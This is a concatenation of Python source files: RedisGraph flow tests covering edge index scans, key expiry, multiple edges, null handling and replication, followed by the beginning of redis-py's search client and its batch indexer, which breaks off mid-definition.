q = """UNWIND range(33, 37) AS x
MATCH (n)-[f:friend {created_at: x}]->()
RETURN n.name
ORDER BY n.name"""
plan = redis_graph.execution_plan(q)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(q)
expected_result = [['Ailon'], ['Ailon'], ['Boaz']]
self.env.assertEquals(query_result.result_set, expected_result)
# similar to the query above, only this time the filter is specified
# by an OR condition
q = """WITH 33 AS min, 37 AS max
MATCH (n)-[f:friend]->()
WHERE f.created_at = min OR f.created_at = max
RETURN n.name
ORDER BY n.name"""
plan = redis_graph.execution_plan(q)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(q)
expected_result = [['Ailon'], ['Boaz']]
self.env.assertEquals(query_result.result_set, expected_result)
# find all person nodes with age equals 33 'x'
# 'x' value is known only at runtime
q = """WITH 33 AS x
MATCH (n)-[f:friend {created_at: x}]->()
RETURN n.name
ORDER BY n.name"""
plan = redis_graph.execution_plan(q)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(q)
expected_result = [["Ailon"]]
self.env.assertEquals(query_result.result_set, expected_result)
# find all person nodes with age equals x + 1
# the expression x+1 is evaluated to the constant 33 only at runtime
# expecting index query to be constructed at runtime
q = """WITH 32 AS x
MATCH (n)-[f:friend]->()
WHERE f.created_at = (x + 1)
RETURN n.name
ORDER BY n.name"""
plan = redis_graph.execution_plan(q)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(q)
expected_result = [["Ailon"]]
self.env.assertEquals(query_result.result_set, expected_result)
# same idea as previous query only we've switched the position of the
# operands, queried entity (p.age) is now on the right hand side of the
# filter, expecting the same behavior
q = """WITH 32 AS x
MATCH (n)-[f:friend]->()
WHERE (x + 1) = f.created_at
RETURN n.name
ORDER BY n.name"""
plan = redis_graph.execution_plan(q)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(q)
expected_result = [["Ailon"]]
self.env.assertEquals(query_result.result_set, expected_result)
# make sure all node scan not removed because we need to filter
q = """MATCH (a)-[e:friend]->()
WHERE a.created_at > 5 AND e.created_at > a.created_at
RETURN DISTINCT a.name"""
plan = redis_graph.execution_plan(q)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Filter', plan)
self.env.assertIn('All Node Scan', plan)
query_result = redis_graph.query(q)
expected_result = [["Ori"]]
self.env.assertEquals(query_result.result_set, expected_result)
def test18_index_scan_and_label_filter(self):
query = "MATCH (n)-[f:friend]->(m) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertNotIn('All Node Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)-[f:friend]->(m) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)-[f:friend]->(m:person) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person {name: 'Roi'})-[f:friend]->(m:person) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person {name: 'Alon'})-[f:friend]->(m:person) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
self.env.assertEquals(query_result.result_set, [])
query = "MATCH (n)<-[f:friend]-(m) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertNotIn('All Node Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)<-[f:friend]-(m) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)<-[f:friend]-(m:person) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person {name: 'Roi'})<-[f:friend]-(m:person) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
self.env.assertEquals(query_result.result_set, [])
query = "MATCH (n:person {name: 'Alon'})<-[f:friend]-(m:person) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
def test19_index_scan_and_with(self):
query = "MATCH (n)-[f:friend]->(m) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertNotIn('All Node Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)-[f:friend]->(m) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)-[f:friend]->(m:person) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person {name: 'Roi'})-[f:friend]->(m:person) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person {name: 'Alon'})-[f:friend]->(m:person) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
self.env.assertEquals(query_result.result_set, [])
query = "MATCH (n)<-[f:friend]-(m) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertNotIn('All Node Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)<-[f:friend]-(m) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)<-[f:friend]-(m:person) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person {name: 'Roi'})<-[f:friend]-(m:person) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
self.env.assertEquals(query_result.result_set, [])
query = "MATCH (n:person {name: 'Alon'})<-[f:friend]-(m:person) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
def test20_index_scan_numeric_accuracy(self):
redis_graph = Graph(self.env.getConnection(), 'large_index_values')
redis_graph.query("CREATE INDEX FOR ()-[r:R1]-() ON (r.id)")
redis_graph.query("CREATE INDEX FOR ()-[r:R2]-() ON (r.id1, r.id2)")
redis_graph.query("UNWIND range(1, 5) AS v CREATE ()-[:R1 {id: 990000000262240068 + v}]->()")
redis_graph.query("UNWIND range(1, 5) AS v CREATE ()-[:R2 {id1: 990000000262240068 + v, id2: 990000000262240068 - v}]->()")
# test index search
result = redis_graph.query("MATCH ()-[u:R1{id: 990000000262240069}]->() RETURN u.id")
expected_result = [[990000000262240069]]
self.env.assertEquals(result.result_set, expected_result)
# test index search from child
result = redis_graph.query("MATCH ()-[u:R1]->() WITH min(u.id) as id MATCH ()-[u:R1{id: id}]->() RETURN u.id")
expected_result = [[990000000262240069]]
self.env.assertEquals(result.result_set, expected_result)
# test index search with or
result = redis_graph.query("MATCH ()-[u:R1]->() WHERE u.id = 990000000262240069 OR u.id = 990000000262240070 RETURN u.id ORDER BY u.id")
expected_result = [[990000000262240069], [990000000262240070]]
self.env.assertEquals(result.result_set, expected_result)
# test resetting index scan operation
result = redis_graph.query("MATCH ()-[u1:R1]->(), ()-[u2:R1]->() WHERE u1.id = 990000000262240069 AND (u2.id = 990000000262240070 OR u2.id = 990000000262240071) RETURN u1.id, u2.id ORDER BY u1.id, u2.id")
expected_result = [[990000000262240069, 990000000262240070], [990000000262240069, 990000000262240071]]
self.env.assertEquals(result.result_set, expected_result)
# test resetting index scan operation when using the consume from child function
result = redis_graph.query("MATCH ()-[u:R1]->() WITH min(u.id) as id MATCH ()-[u1:R1]->(), ()-[u2:R1]->() WHERE u1.id = 990000000262240069 AND (u2.id = 990000000262240070 OR u2.id = 990000000262240071) RETURN u1.id, u2.id ORDER BY u1.id, u2.id")
expected_result = [[990000000262240069, 990000000262240070], [990000000262240069, 990000000262240071]]
self.env.assertEquals(result.result_set, expected_result)
# test resetting index scan operation when rebuild index is required
result = redis_graph.query("MATCH ()-[u:R1]->() WITH min(u.id) as id MATCH ()-[u1:R1]->(), ()-[u2:R1]->() WHERE u1.id = id AND (u2.id = 990000000262240070 OR u2.id = 990000000262240071) RETURN u1.id, u2.id ORDER BY u1.id, u2.id")
expected_result = [[990000000262240069, 990000000262240070], [990000000262240069, 990000000262240071]]
self.env.assertEquals(result.result_set, expected_result)
# test index scan with 2 different attributes
result = redis_graph.query("MATCH ()-[u:R2]->() WHERE u.id1 = 990000000262240069 AND u.id2 = 990000000262240067 RETURN u.id1, u.id2")
expected_result = [[990000000262240069, 990000000262240067]]
self.env.assertEquals(result.result_set, expected_result)
```
#### File: tests/flow/test_expiry.py
```python
from common import *
import time
GRAPH_ID = "expire"
class testExpiry():
def test01_expire_graph(self):
# create a redisgraph object
env = Env(decodeResponses=True)
redis_con = env.getConnection()
redis_graph = Graph(redis_con, GRAPH_ID)
# create a single node
redis_graph.query("create ()")
# expire key in 100ms
expire_in_ms = 100
env.assertTrue(redis_con.pexpire(GRAPH_ID, expire_in_ms))
# wait for key to expire
time.sleep((expire_in_ms * 3) / 1000) # convert from sec to ms
# key should have been evicted by now
env.assertFalse(redis_con.exists(GRAPH_ID))
try:
slowlog = redis_con.execute_command("GRAPH.SLOWLOG", GRAPH_ID)
except ResponseError as e:
env.assertIn("Invalid graph operation on empty key", str(e))
```
#### File: tests/flow/test_multiple_edges.py
```python
from common import *
GRAPH_ID = "multi_edge"
redis_graph = None
class testGraphMultipleEdgeFlow(FlowTestsBase):
def __init__(self):
self.env = Env(decodeResponses=True)
global redis_graph
redis_con = self.env.getConnection()
redis_graph = Graph(redis_con, GRAPH_ID)
# Connect a single node to all other nodes.
def test_multiple_edges(self):
# Create graph with no edges.
query = """CREATE (a {v:1}), (b {v:2})"""
actual_result = redis_graph.query(query)
# Expecting no connections.
query = """MATCH (a {v:1})-[e]->(b {v:2}) RETURN count(e)"""
actual_result = redis_graph.query(query)
self.env.assertEquals(len(actual_result.result_set), 1)
edge_count = actual_result.result_set[0][0]
self.env.assertEquals(edge_count, 0)
# Connect a to b with a single edge of type R.
query = """MATCH (a {v:1}), (b {v:2}) CREATE (a)-[:R {v:1}]->(b)"""
actual_result = redis_graph.query(query)
self.env.assertEquals(actual_result.relationships_created, 1)
# Expecting single connections.
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN count(e)"""
actual_result = redis_graph.query(query)
edge_count = actual_result.result_set[0][0]
self.env.assertEquals(edge_count, 1)
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN ID(e)"""
actual_result = redis_graph.query(query)
edge_id = actual_result.result_set[0][0]
self.env.assertEquals(edge_id, 0)
# Connect a to b with additional edge of type R.
query = """MATCH (a {v:1}), (b {v:2}) CREATE (a)-[:R {v:2}]->(b)"""
actual_result = redis_graph.query(query)
self.env.assertEquals(actual_result.relationships_created, 1)
# Expecting two connections.
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN count(e)"""
actual_result = redis_graph.query(query)
edge_count = actual_result.result_set[0][0]
self.env.assertEquals(edge_count, 2)
# Variable length path.
query = """MATCH (a {v:1})-[:R*]->(b {v:2}) RETURN count(b)"""
actual_result = redis_graph.query(query)
edge_count = actual_result.result_set[0][0]
self.env.assertEquals(edge_count, 2)
# Remove first connection.
query = """MATCH (a {v:1})-[e:R {v:1}]->(b {v:2}) DELETE e"""
actual_result = redis_graph.query(query)
self.env.assertEquals(actual_result.relationships_deleted, 1)
# Expecting single connections.
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN e.v"""
actual_result = redis_graph.query(query)
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN ID(e)"""
actual_result = redis_graph.query(query)
edge_id = actual_result.result_set[0][0]
self.env.assertEquals(edge_id, 1)
# Remove second connection.
query = """MATCH (a {v:1})-[e:R {v:2}]->(b {v:2}) DELETE e"""
actual_result = redis_graph.query(query)
self.env.assertEquals(actual_result.relationships_deleted, 1)
# Expecting no connections.
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN count(e)"""
actual_result = redis_graph.query(query)
self.env.assertEquals(len(actual_result.result_set), 1)
edge_count = actual_result.result_set[0][0]
self.env.assertEquals(edge_count, 0)
# Remove none existing connection.
query = """MATCH (a {v:1})-[e]->(b {v:2}) DELETE e"""
actual_result = redis_graph.query(query)
self.env.assertEquals(actual_result.relationships_deleted, 0)
# Make sure we can reform connections.
query = """MATCH (a {v:1}), (b {v:2}) CREATE (a)-[:R {v:3}]->(b)"""
actual_result = redis_graph.query(query)
self.env.assertEquals(actual_result.relationships_created, 1)
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN count(e)"""
actual_result = redis_graph.query(query)
edge_count = actual_result.result_set[0][0]
self.env.assertEquals(edge_count, 1)
```
#### File: tests/flow/test_null_handling.py
```python
from common import *
redis_graph = None
class testNullHandlingFlow(FlowTestsBase):
def __init__(self):
self.env = Env(decodeResponses=True)
global redis_graph
redis_con = self.env.getConnection()
redis_graph = Graph(redis_con, "null_handling")
self.populate_graph()
def populate_graph(self):
# Create a single node.
node = Node(label="L", properties={"v": "v1"})
redis_graph.add_node(node)
redis_graph.flush()
# Error when attempting to create a relationship with a null endpoint.
def test01_create_null(self):
try:
query = """MATCH (a) OPTIONAL MATCH (a)-[nonexistent_edge]->(nonexistent_node) CREATE (nonexistent_node)-[:E]->(a)"""
redis_graph.query(query)
assert(False)
except redis.exceptions.ResponseError:
# Expecting an error.
pass
try:
query = """MATCH (a) OPTIONAL MATCH (a)-[nonexistent_edge]->(nonexistent_node) CREATE (a)-[:E]->(nonexistent_node)"""
redis_graph.query(query)
assert(False)
except redis.exceptions.ResponseError:
# Expecting an error.
pass
# Error when attempting to merge a relationship with a null endpoint.
def test02_merge_null(self):
try:
query = """MATCH (a) OPTIONAL MATCH (a)-[nonexistent_edge]->(nonexistent_node) MERGE (nonexistent_node)-[:E]->(a)"""
redis_graph.query(query)
assert(False)
except redis.exceptions.ResponseError:
# Expecting an error.
pass
try:
query = """MATCH (a) OPTIONAL MATCH (a)-[nonexistent_edge]->(nonexistent_node) MERGE (a)-[:E]->(nonexistent_node)"""
redis_graph.query(query)
assert(False)
except redis.exceptions.ResponseError:
# Expecting an error.
pass
# SET should update attributes on non-null entities and ignore null entities.
def test03_set_null(self):
query = """MATCH (a) OPTIONAL MATCH (a)-[nonexistent_edge]->(nonexistent_node) SET a.v2 = true, nonexistent_node.v2 = true, a.v3 = nonexistent_node.v3 RETURN a.v2, nonexistent_node.v2, a.v3"""
actual_result = redis_graph.query(query)
# The property should be set on the real node and ignored on the null entity.
assert(actual_result.properties_set == 1)
expected_result = [[True, None, None]]
self.env.assertEquals(actual_result.result_set, expected_result)
# DELETE should ignore null entities.
def test04_delete_null(self):
query = """MATCH (a) OPTIONAL MATCH (a)-[nonexistent_edge]->(nonexistent_node) DELETE nonexistent_node"""
actual_result = redis_graph.query(query)
assert(actual_result.nodes_deleted == 0)
# Functions should handle null inputs appropriately.
def test05_null_function_inputs(self):
query = """MATCH (a) OPTIONAL MATCH (a)-[r]->(b) RETURN type(r), labels(b), b.v * 5"""
actual_result = redis_graph.query(query)
expected_result = [[None, None, None]]
self.env.assertEquals(actual_result.result_set, expected_result)
# Path functions should handle null inputs appropriately.
def test06_null_named_path_function_inputs(self):
query = """MATCH (a) OPTIONAL MATCH p = (a)-[r]->() RETURN p, length(p), collect(relationships(p))"""
actual_result = redis_graph.query(query)
# The path and function calls on it should return NULL, while collect() returns an empty array.
expected_result = [[None, None, []]]
self.env.assertEquals(actual_result.result_set, expected_result)
# Scan and traversal operations should gracefully handle NULL inputs.
def test07_null_graph_entity_inputs(self):
query = """WITH NULL AS a MATCH (a) RETURN a"""
actual_result = redis_graph.query(query)
# Expect one NULL entity to be returned.
expected_result = [[None]]
self.env.assertEquals(actual_result.result_set, expected_result)
query = """WITH NULL AS a MATCH (a)-[e]->(b) RETURN a, e, b"""
plan = redis_graph.execution_plan(query)
# Verify that we are attempting to perform a traversal but no scan.
self.env.assertNotIn("Scan", plan)
self.env.assertIn("Conditional Traverse", plan)
actual_result = redis_graph.query(query)
# Expect no results.
expected_result = []
self.env.assertEquals(actual_result.result_set, expected_result)
query = """WITH NULL AS e MATCH (a:L)-[e]->(b) RETURN a, e, b"""
plan = redis_graph.execution_plan(query)
# Verify that we are performing a scan and traversal.
self.env.assertIn("Label Scan", plan)
self.env.assertIn("Conditional Traverse", plan)
actual_result = redis_graph.query(query)
# Expect no results.
expected_result = []
self.env.assertEquals(actual_result.result_set, expected_result)
# ValueHashJoin ops should not treat null values as equal.
def test08_null_value_hash_join(self):
query = """MATCH (a), (b) WHERE a.fakeval = b.fakeval RETURN a, b"""
plan = redis_graph.execution_plan(query)
# Verify that we are performing a ValueHashJoin
self.env.assertIn("Value Hash Join", plan)
actual_result = redis_graph.query(query)
# Expect no results.
expected_result = []
self.env.assertEquals(actual_result.result_set, expected_result)
# Perform a sanity check on a ValueHashJoin that returns a result
query = """MATCH (a), (b) WHERE a.v = b.v RETURN a.v, b.v"""
actual_result = redis_graph.query(query)
expected_result = [['v1', 'v1']]
self.env.assertEquals(actual_result.result_set, expected_result)
```
#### File: tests/flow/test_replication_states.py
```python
from common import *
from itertools import permutations
from enum import Enum
import random
class Connection(Enum):
Connected = 1
Disconnected = 2
# TODO: when introducing new encoder/decoder this needs to be updated consider
# using GRAPH.DEBUG command to be able to get this data
keys = {
b'x': b'\x07\x81\x82\xb6\xa9\x85\xd6\xadh\n\x05\x02x\x00\x02\x1e\x02\x00\x02\x01\x02\x00\x02\x03\x02\x01\x05\x02v\x00\x02\x01\x02\x00\x05\x02N\x00\x02\x01\x02\x01\x05\x02v\x00\x02\x00\x02\x01\x02\x01\x02\n\x02\x00\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x01\x02\x01\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x02\x02\x02\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x03\x02\x03\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x04\x02\x04\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x05\x02\x05\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x06\x02\x06\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x07\x02\x07\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x08\x02\x08\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\t\x02\t\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\n\x00\t\x00\x84\xf96Z\xd1\x98\xec\xc0',
b'{x}x_a244836f-fe81-4f8d-8ee2-83fc3fbcf102': b'\x07\x81\x82\xb6\xa9\x86g\xadh\n\x05\x02x\x00\x02\x1e\x02\x00\x02\x01\x02\x00\x02\x03\x02\x01\x05\x02v\x00\x02\x01\x02\x00\x05\x02N\x00\x02\x01\x02\x01\x05\x02v\x00\x02\x00\x02\x01\x02\x01\x02\n\x02\n\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x0b\x02\x0b\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x0c\x02\x0c\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\r\x02\r\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x0e\x02\x0e\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x0f\x02\x0f\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x10\x02\x10\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x11\x02\x11\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x12\x02\x12\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x13\x02\x13\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x14\x00\t\x00\x13H\x11\xb8\x15\xd3\xdc~',
b'{x}x_53ab30bb-1dbb-47b2-a41d-cac3acd68b8c': b'\x07\x81\x82\xb6\xa9\x86g\xadh\n\x05\x02x\x00\x02\x1e\x02\x00\x02\x01\x02\x00\x02\x03\x02\x01\x05\x02v\x00\x02\x01\x02\x00\x05\x02N\x00\x02\x01\x02\x01\x05\x02v\x00\x02\x00\x02\x05\x02\x01\x02\n\x02\x02\x02\x00\x02\x03\x02\x00\x02\x04\x02\x00\x02\x05\x02\x01\x02\x14\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x15\x02\x15\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x16\x02\x16\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x17\x02\x17\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x18\x02\x18\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x19\x02\x19\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x1a\x02\x1a\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x1b\x02\x1b\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x1c\x02\x1c\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x1d\x02\x1d\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x1e\x00\t\x00\x1b\xa64\xd6\xf5\x0bk\xa6'
}
# test to see if replication works as expected when importing data
# RedisGraph should replicate all data using virtual keys mechanism
# in case we imported part of the data validate that we replicate it correctly.
class testReplicationState():
def __init__(self):
self.env = Env(useSlaves=True, decodeResponses=True, env='oss', moduleArgs='VKEY_MAX_ENTITY_COUNT 10')
self.master = self.env.getConnection()
self.slave = self.env.getSlaveConnection()
info = self.slave.info("Replication")
self.master_host = info["master_host"]
self.master_port = info["master_port"]
self.connection_state = Connection.Connected
# skip test if we're running under Valgrind
if self.env.envRunner.debugger is not None:
self.env.skip() # valgrind is not working correctly with replication
# check that the expected key count exists in both master and slave
def _check(self, keys_master, keys_slave):
if keys_master is not None:
keys = self.master.keys('*')
self.env.assertEqual(len(keys), keys_master)
if keys_slave is not None:
# the WAIT command forces master slave sync to complete
self.master.execute_command("WAIT", "1", "0")
keys = self.slave.keys('*')
self.env.assertEqual(len(keys), keys_slave)
if keys_master is not None:
keys = self.master.keys('*')
self.env.assertEqual(len(keys), keys_master)
# restore the key data and validate the # of keys
def _step(self, key, keys_master):
self.master.restore(key, '0', keys[key])
self._check(keys_master, None)
# validate that the imported data exists in both master and slave
def _test_data(self):
expected = [[i] for i in range(1, 31)]
q = "MATCH (n:N) RETURN n.v"
result = self.master.execute_command("GRAPH.RO_QUERY", "x", q)
self.env.assertEqual(result[1], expected)
result = self.slave.execute_command("GRAPH.RO_QUERY", "x", q)
self.env.assertEqual(result[1], expected)
def _connect_replication(self):
if self.connection_state == Connection.Disconnected:
self.slave.slaveof(self.master_host, self.master_port)
self.connection_state = Connection.Connected
def _disconnect_replication(self):
if self.connection_state == Connection.Connected:
self.slave.slaveof()
self.connection_state = Connection.Disconnected
def _connection_permutation(self, state, i):
if state[i] == 1:
self._connect_replication()
elif state[i] == 0:
self._disconnect_replication()
def _permutation(self, r, d):
for i in range(r ** d):
res = []
for j in range(d):
res.append((i >> j) % 2)
yield res
def _choose_random(self, iter, k):
is_random = True
if is_random:
return random.choices(list(iter), k=k)
return iter
def test_replication_permutations(self):
for scenario in self._choose_random(permutations(keys.keys()), 2):
print(f"scenario: {scenario}")
for connection_permutation in self._choose_random(self._permutation(2, 5), 3):
print(f"connection_permutation: {connection_permutation}")
self.master.flushall()
self._check(0, 0)
self._connection_permutation(connection_permutation, 0)
aux = self.master.execute_command("GRAPH.DEBUG", "AUX", "START")
self.env.assertEqual(aux, 1)
self._connection_permutation(connection_permutation, 1)
self._step(scenario[0], 1)
self._connection_permutation(connection_permutation, 2)
self._step(scenario[1], 2)
self._connection_permutation(connection_permutation, 3)
self._step(scenario[2], 3)
self._connection_permutation(connection_permutation, 4)
aux = self.master.execute_command("GRAPH.DEBUG", "AUX", "END")
self.env.assertEqual(aux, 0)
self._connect_replication()
self._check(1, 1)
self._test_data()
``` |
{
"source": "10088/redis-py",
"score": 3
} |
#### File: commands/search/__init__.py
```python
import redis
from .commands import AsyncSearchCommands, SearchCommands
class Search(SearchCommands):
"""
Create a client for talking to search.
It abstracts the API of the module and lets you just use the engine.
"""
class BatchIndexer:
"""
A batch indexer allows you to automatically batch
document indexing in pipelines, flushing it every N documents.
"""
def __init__(self, client, chunk_size=1000):
self.client = client
self.execute_command = client.execute_command
self._pipeline = client.pipeline(transaction=False, shard_hint=None)
self.total = 0
self.chunk_size = chunk_size
self.current_chunk = 0
def __del__(self):
if self.current_chunk:
self.commit()
def add_document(
self,
doc_id,
nosave=False,
score=1.0,
payload=None,
replace=False,
partial=False,
no_create=False,
**fields,
):
"""
Add a document to the batch query
"""
self.client._add_document(
doc_id,
conn=self._pipeline,
nosave=nosave,
score=score,
payload=payload,
replace=replace,
partial=partial,
no_create=no_create,
**fields,
)
self.current_chunk += 1
self.total += 1
if self.current_chunk >= self.chunk_size:
self.commit()
def add_document_hash(
self,
doc_id,
score=1.0,
replace=False,
):
"""
Add a hash to the batch query
"""
self.client._add_document_hash(
doc_id,
conn=self._pipeline,
score=score,
replace=replace,
)
self.current_chunk += 1
self.total += 1
if self.current_chunk >= self.chunk_size:
self.commit()
def commit(self):
"""
Manually commit and flush the batch indexing query
"""
self._pipeline.execute()
self.current_chunk = 0
def __init__(self, client, index_name="idx"):
"""
Create a new Client for the given index_name.
The default name is `idx`
If conn is not None, we employ an already existing redis connection
"""
self.MODULE_CALLBACKS = {}
self.client = client
self.index_name = index_name
self.execute_command = client.execute_command
self._pipeline = client.pipeline
def pipeline(self, transaction=True, shard_hint=None):
"""Creates a pipeline for the SEARCH module, that can be used for executing
SEARCH commands, as well as classic core commands.
"""
p = Pipeline(
connection_pool=self.client.connection_pool,
